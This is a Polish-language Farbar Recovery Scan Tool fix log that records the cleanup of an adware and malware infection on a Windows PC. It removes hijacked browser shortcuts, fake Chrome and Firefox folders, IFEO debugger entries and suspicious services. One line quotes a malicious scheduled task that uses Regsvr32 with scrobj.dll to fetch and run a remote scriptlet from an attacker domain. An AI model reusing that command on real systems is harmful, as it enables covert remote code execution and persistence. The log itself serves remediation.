Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 28-05-2017
Uruchomiony przez Lareco (31-05-2017 14:25:19) Run:1
Uruchomiony z C:\Instalki
Załadowane profile: Lareco (Dostępne profile: Lareco)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll
C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Setleaf
RemoveDirectory: C:\Users\Lareco\AppData\Local\Setleaf
RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Setleaf
FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe
FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Lareco\AppData\Local\Firefox
RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Firefox
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
HKU\S-1-5-21-3868839101-544848183-1789199905-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA
S2 InstallerService; "C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 pxldqpow; \??\C:\Users\Lareco\AppData\Local\Temp\pxldqpow.sys [X] <==== UWAGA
2017-05-24 12:10 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\55
2017-05-24 12:09 - 2017-05-24 12:09 - 00000042 _____ C:\Windows\SysWOW64\GZ
2017-05-11 15:10 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 15:09 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 15:09 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\1111111
C:\Program Files (x86)\BiaoJi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla\Firefox
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Lareco\AppData\Local\Mozilla\Firefox
C:\Users\Lareco\AppData\Roaming\Mozilla\Firefox
C:\Users\Lareco\AppData\Roaming\Profiles
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.